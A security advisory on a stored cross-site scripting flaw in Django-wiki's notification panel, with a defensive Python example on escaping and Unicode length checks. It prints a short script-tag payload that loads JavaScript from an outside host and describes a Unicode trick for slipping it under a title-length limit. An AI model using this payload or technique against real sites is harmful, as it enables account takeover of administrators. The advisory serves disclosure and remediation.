Overview
In Django-wiki, versions 0.0.20 to 0.7.8 are vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications section. An attacker who has permission to edit pages can inject a JavaScript payload into the title field. When a victim receives a notification about the change made in the application, the payload renders in the notification panel and loads external JavaScript.
Details
The Django-wiki application is vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications section. An attacker who has permission to edit pages can inject a JavaScript payload into the title field. When a victim receives a notification about the change made in the application, the payload renders in the notification panel and loads external JavaScript.
PoC Details
Log into the application as a non-admin user and open any page (a test page) on which that user has edit permission. Insert the JavaScript payload shown below into the title parameter. Then log in from another browser as an admin and watch the notification bar at the top: when the victim receives the notification update, the payload is triggered and loads the external JavaScript into the application. The JavaScript payload used is under 25 characters, because the code truncates the title parameter when it is longer than 25 characters. The Unicode character “℡” is used in the domain name because the application counts it as a single character while the browser renders it as the three characters “TEL” through Unicode compatibility normalisation, which produces a domain name of the minimum length of 3 characters. Content of the file “a.js” hosted on the attacker's server:
PoC Code
<script src=//℡z.in/a.js>
Affected Environments
0.0.20 to 0.7.8
Prevention
Upgrade to version 0.7.9 or later
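The two defensive points in this advisory are that a code-point length limit on the title is not a sanitiser (the PoC fits inside it, and “℡” counts as one code point while normalising to three letters) and that the title must be HTML-escaped where the notification is rendered. The following Python is an added example written for this page, not django-wiki's own code or its fix; it assumes a notification fragment built from an untrusted title, uses the 25-character truncation the advisory describes, and uses the advisory's own payload as a constructed test input.

```python
"""Added example (not django-wiki's code): why truncating a notification
title does not prevent stored XSS, and what escaping on output changes.

Assumptions (not from the project): the notification is rendered as a
simple <li> fragment, and 25 is the truncation length from the advisory.
"""
import html
import unicodedata

TITLE_MAX_LEN = 25  # truncation length described in the advisory

# The payload quoted in the advisory, used here only as a constructed test input.
ADVISORY_PAYLOAD = "<script src=//\u2121z.in/a.js>"


def truncate_title(title: str) -> str:
    """Code-point based truncation, the only limit the vulnerable path relied on."""
    return title[:TITLE_MAX_LEN]


def render_notification_unsafe(title: str) -> str:
    """Vulnerable pattern: the untrusted title is concatenated into HTML
    without escaping (the equivalent of marking it 'safe' in a template)."""
    return f"<li class='notification'>{truncate_title(title)}</li>"


def render_notification_safe(title: str) -> str:
    """Hardened pattern: HTML-escape the title before it reaches the markup.
    In a Django template this is what autoescaping or the |escape filter
    does; the fix is to never bypass it for user-controlled titles."""
    return f"<li class='notification'>{html.escape(truncate_title(title), quote=True)}</li>"


def contains_raw_script_tag(rendered: str) -> bool:
    """Detection helper: does the rendered fragment still contain an
    unescaped <script opener? True means the browser would parse it as a tag."""
    return "<script" in rendered.lower()


def compat_expansion(text: str) -> tuple:
    """Return (code points, length after NFKC normalisation).

    Compatibility characters such as U+2121 TELEPHONE SIGN (the “℡” from the
    advisory) are one code point but normalise to the three letters 'TEL',
    so a length check on code points underestimates what the browser uses
    when it maps the hostname."""
    return len(text), len(unicodedata.normalize("NFKC", text))


if __name__ == "__main__":
    print("payload length:", len(ADVISORY_PAYLOAD), "(limit", TITLE_MAX_LEN, ")")
    print("unsafe :", render_notification_unsafe(ADVISORY_PAYLOAD))
    print("safe   :", render_notification_safe(ADVISORY_PAYLOAD))
    print("NFKC expansion of \u2121:", compat_expansion("\u2121"))
```

The escaped fragment shows the payload as literal text (`&lt;script ...&gt;`) instead of a tag, which is the behaviour a patched notification panel should have; the `compat_expansion` check is the reason a validator that counts code points cannot be relied on to keep a hostname out of a 25-character field.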